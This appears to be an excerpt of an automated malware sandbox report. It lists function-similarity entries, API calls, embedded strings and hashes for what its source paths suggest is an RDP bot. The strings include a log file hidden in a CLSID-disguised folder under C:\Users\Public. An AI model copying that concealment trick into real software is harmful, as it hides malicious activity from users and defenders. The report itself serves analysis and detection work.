                  • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                  • API String ID: 39653677-3852240402
                  • Opcode ID: 0d6f832da30618db4b5d4fa9a209532a715be4f109d4233185bf4af6c46cf1be
                  • Instruction ID: 6baded20d3ae3d3779f19790db304e04ae59d09a08d6c7a1fccc76557bdb1f5f
                  • Opcode Fuzzy Hash: 0d6f832da30618db4b5d4fa9a209532a715be4f109d4233185bf4af6c46cf1be
                  • Instruction Fuzzy Hash: 15419EA1A0CE4391FB129F96E4403FC675ABF413A8F9845B6D99E076B5DF3CE6068310
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Heap$Processstrlen$AllocFree
                  • String ID: (buf != NULL)$(buf_sz != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                  • API String ID: 1318626975-3508512667
                  • Opcode ID: da587c79dbe917f76734759ab2676bea6474a8d68aac5a99633f8add96539cc3
                  • Instruction ID: 1f9b9b2d9fa5b47e565563fa39e61c6272a24851cde7bafb4e656f138a594ab5
                  • Opcode Fuzzy Hash: da587c79dbe917f76734759ab2676bea6474a8d68aac5a99633f8add96539cc3
                  • Instruction Fuzzy Hash: 22311D61A0CB47C9FA52BB11E8003B9A2A0AF41BC4FA440F5EA4DD7695DF7CE955C360
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Heap$Processstrlen$AllocFree
                  • String ID: (buf != NULL)$(buf_sz != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                  • API String ID: 1318626975-3508512667
                  • Opcode ID: 0bc9325c8b3e7868e1601da2b2f9260856c9ceb67730c1331099926d685bb0c7
                  • Instruction ID: 13b30764f603931cf1cf0063b8ac0b605a717ecb1ac5b88c94dcde38eca43e21
                  • Opcode Fuzzy Hash: 0bc9325c8b3e7868e1601da2b2f9260856c9ceb67730c1331099926d685bb0c7
                  • Instruction Fuzzy Hash: E7316D61A09E4385FB529BA3E8403BD2369AF40BA4F5840B6D98E477B5DF7CE906C350
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: AttributesFile$ErrorLast
                  • String ID: (attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
                  • API String ID: 365566950-3523202656
                  • Opcode ID: ed5ed36b059e511eb2f8f5c8c9b7c33a9d6a062b629e207089bcb294ad6d5c75
                  • Instruction ID: 586ef1ff59c84121c4b39821e7ed3ac96f606879bfef479da3b4ace2e22c2914
                  • Opcode Fuzzy Hash: ed5ed36b059e511eb2f8f5c8c9b7c33a9d6a062b629e207089bcb294ad6d5c75
                  • Instruction Fuzzy Hash: 28516F61A0C747C6FB61BB14A480279F250AF423CCFF141BAD95EC6698EE2CE885C731
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: AttributesFile$ErrorLast
                  • String ID: (attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
                  • API String ID: 365566950-3523202656
                  • Opcode ID: a91ea276b69403569ff7b9c13ec786870b481035977750bd3e95e535872ba10d
                  • Instruction ID: 0d4f42c4be8f330c2a0ba00b6c254f29a88322580f0c992a71c764629e22c00a
                  • Opcode Fuzzy Hash: a91ea276b69403569ff7b9c13ec786870b481035977750bd3e95e535872ba10d
                  • Instruction Fuzzy Hash: 9C51E560A0CE439DF7A08B93E44027E36699F00774F1055BEE9AE866B6DF2CE845C701
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Deletefflushfwrite
                  • String ID: (key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegDeleteKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_delete_key$u
                  • API String ID: 2939363742-2883486457
                  • Opcode ID: 5db890f9e46c202e1258f0c20e4cbb3838a38e3a355a7e4acfa4327e2c6da60f
                  • Instruction ID: 220106d143a4dba36619202367bd263dac9c8791f90c9e01dd7367ea506075ec
                  • Opcode Fuzzy Hash: 5db890f9e46c202e1258f0c20e4cbb3838a38e3a355a7e4acfa4327e2c6da60f
                  • Instruction Fuzzy Hash: 78413B62D0C313D9FA21B648A4407BCD2506F01BD4FF981FAC99DE7690DE6CAD8583A1
                  APIs
                  • UnlockFileEx.KERNEL32(?,?,?,?,?,?,00000000,000001DE38FB13D0,?,00007FF76A9089CF,?,?,00000000,00007FF76A908CE3), ref: 00007FF76A9041BD
                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,000001DE38FB13D0,?,00007FF76A9089CF,?,?,00000000,00007FF76A908CE3), ref: 00007FF76A9041CE
                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000001DE38FB13D0,?,00007FF76A9089CF,?,?,00000000,00007FF76A908CE3), ref: 00007FF76A904284
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
                  • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                  • API String ID: 497672076-345319545
                  • Opcode ID: 79864a9b3b9f3dc1cedf9f313fdd16b145c9a36e0152559ce9b0fc825d097d0b
                  • Instruction ID: e40583c1de92339cfca9347f9f637535324f4788106535498d19e469738300db
                  • Opcode Fuzzy Hash: 79864a9b3b9f3dc1cedf9f313fdd16b145c9a36e0152559ce9b0fc825d097d0b
                  • Instruction Fuzzy Hash: C0417D61B0C743D5FA21A718F5406B892506FE57D8FF002BAC47DD76D0EE3CA9858725
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
                  • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                  • API String ID: 497672076-345319545
                  • Opcode ID: 3cde496f8fe1cea806b8acfa1f4d21fd2e944fc8d41c11cee32b443d30cf7dcb
                  • Instruction ID: 9358edcc6c1e57e2873ed43b3e4bfa873f76f9faa1fbb6edd9431a3ca86f9706
                  • Opcode Fuzzy Hash: 3cde496f8fe1cea806b8acfa1f4d21fd2e944fc8d41c11cee32b443d30cf7dcb
                  • Instruction Fuzzy Hash: 1B4170A0F1CD4381FB214B97F680ABC27596F517B8FA442B6C41E075F4AE2DE9458712
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: ErrorGlobalLastMemoryStatus
                  • String ID: $(mi != NULL)$;$H:/Projects/rdp/bot/codebase/sys.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu)$sys_mem_info$~
                  • API String ID: 3848946878-1815531218
                  • Opcode ID: 992c4d4525d5bd7699dbef2775a21cd18ee56e9338e2105a6f9fefd9d462d6c8
                  • Instruction ID: 78eb39fbfef68be08a35c85b5282f8d85312fcbc1cc57798dc41f35b2efaae17
                  • Opcode Fuzzy Hash: 992c4d4525d5bd7699dbef2775a21cd18ee56e9338e2105a6f9fefd9d462d6c8
                  • Instruction Fuzzy Hash: EA310F50F0C383C6FBA5B7689480379F2509F54388FB091BAC60E865D2DE6D6D85D369
                  APIs
                  • GetModuleFileNameA.KERNEL32(?,?,00000104,?,00000104,RDP-Controller.lock,00007FF76A904AD5,?,?,?,?,?,000001DE38FB13D0,00007FF76A904BE5), ref: 00007FF76A9049A1
                  • GetLastError.KERNEL32(?,?,00000104,?,00000104,RDP-Controller.lock,00007FF76A904AD5,?,?,?,?,?,000001DE38FB13D0,00007FF76A904BE5), ref: 00007FF76A9049AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: ErrorFileLastModuleName
                  • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$RDP-Controller.lock$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path
                  • API String ID: 2776309574-725851072
                  • Opcode ID: e73b41e6b0ade8854d3c53aa8d2ac3d56b2463943f3118e37cc190388dc7f530
                  • Instruction ID: 533e0855f5a9505c196ed85e2642288c91215365acaec9ccae051315757ef096
                  • Opcode Fuzzy Hash: e73b41e6b0ade8854d3c53aa8d2ac3d56b2463943f3118e37cc190388dc7f530
                  • Instruction Fuzzy Hash: 42317C61A08B17D9FB12AB14E8403B4A294BF607C8FF440BAD95CC71A1EE3DAD45C730
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorFileLastModuleName
                  • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path
                  • API String ID: 2776309574-3755585189
                  • Opcode ID: c2311c386f09df6b6a9eda7ed4a9fb1ee796fada5a3d4f72b6f2a9a66e2b3150
                  • Instruction ID: 2f8208485d1eb4d612e59b0026d874ca7171d4125a6d20c02cc57da915235ce0
                  • Opcode Fuzzy Hash: c2311c386f09df6b6a9eda7ed4a9fb1ee796fada5a3d4f72b6f2a9a66e2b3150
                  • Instruction Fuzzy Hash: 11319EA1A18D4795FB129FA7E8007B92759BF003BCF9844B6DA0D471B4EF3CA949C311
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: ErrorFileLast$CloseCreateHandleSize
                  • String ID: (path != NULL)$(size != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                  • API String ID: 3555958901-3761180060
                  • Opcode ID: 7881fccee05c5221c2473d1a5f04562d3ae20056194d28bf775210df14918d7c
                  • Instruction ID: 2f2dc3bdd1f049f42d5e19ae680fccccfb3c11b04881af6bb60302c23d1e7187
                  • Opcode Fuzzy Hash: 7881fccee05c5221c2473d1a5f04562d3ae20056194d28bf775210df14918d7c
                  • Instruction Fuzzy Hash: 33616115E0C353C6F7606634A044B7BE1419F503E8FB906FAD85EDB6D4DE2DAC8883A1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorFileLast$CloseCreateHandleSize
                  • String ID: (path != NULL)$(size != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                  • API String ID: 3555958901-3761180060
                  • Opcode ID: c009bd01cccd0521137d8360388e511eedb2c5f2218c9c8db67dbe29a72d6b15
                  • Instruction ID: 33c902ba592c6e293a952c29c4f1eb95eab6d31e1f1f9512eae1c423a9949c7e
                  • Opcode Fuzzy Hash: c009bd01cccd0521137d8360388e511eedb2c5f2218c9c8db67dbe29a72d6b15
                  • Instruction Fuzzy Hash: 6C616261D2CD5782F7214796A4443BC1249AF0037CF2946FAC95F9B6F0EE2CBD858B52
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: File$CloseCreateErrorHandleLastTime
                  • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
                  • API String ID: 2291555494-1574117953
                  • Opcode ID: 6503fd3c71ec1f2c0a17c8cf3aa3bd445eef4d6ac34fdf5946c7a978524476ca
                  • Instruction ID: fb50f54fe1d71b37dd17dfd1ce89d258f9238516deba89514792e957257cd56b
                  • Opcode Fuzzy Hash: 6503fd3c71ec1f2c0a17c8cf3aa3bd445eef4d6ac34fdf5946c7a978524476ca
                  • Instruction Fuzzy Hash: 26516061E0C352CAFB216B249544B7AE1906F007E8FB942BACD1ECB6D0DF2DED459361
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: _errno$strtol
                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                  • API String ID: 3596500743-1951032453
                  • Opcode ID: 26b023cdf3c8a21f546063e915a23ba0054b72c6990841bb7ca5d267b8a61738
                  • Instruction ID: 58302566db3d78b0bbc9171dfd4afe38893e6ef41bbbe1e0cee5a6592902c1d2
                  • Opcode Fuzzy Hash: 26b023cdf3c8a21f546063e915a23ba0054b72c6990841bb7ca5d267b8a61738
                  • Instruction Fuzzy Hash: 22217C21A08743D6F722BF15A8407AAB760BB457C4FA040B5EE4C87AA4DF7CE886D710
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: _errno$_strtoui64
                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                  • API String ID: 3513630032-2069802722
                  • Opcode ID: 78e57a7a08c9cae741ef0bea8fdc423b7346a36cfbff13efa059eb0cd889def9
                  • Instruction ID: 387e4fe3b2710bf6a1214cd9ddbdd681b0616d3f458d78bbe9b4039313037d24
                  • Opcode Fuzzy Hash: 78e57a7a08c9cae741ef0bea8fdc423b7346a36cfbff13efa059eb0cd889def9
                  • Instruction Fuzzy Hash: 7F215E21608B46DAF712AF15F8407AAB3A4FB45784FA440BAEE8C87664DF7CD985C710
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: strlen$_mbscat
                  • String ID: (file_path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file$service
                  • API String ID: 3951308622-2217284372
                  • Opcode ID: 447ed48d09f86569cbc36a8a8807c8874fe1818e0a9ef4791dac73f7df4624e8
                  • Instruction ID: 68a76a5733bd3401f3eb5deff269a9ff5604d9612eccf70d4a19352454bd31a9
                  • Opcode Fuzzy Hash: 447ed48d09f86569cbc36a8a8807c8874fe1818e0a9ef4791dac73f7df4624e8
                  • Instruction Fuzzy Hash: FA11D621E0C747C8FB057F1998507B9E6815F61BC8FEC80B4DE4D8B2C6DE2C98108760
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: strcmp
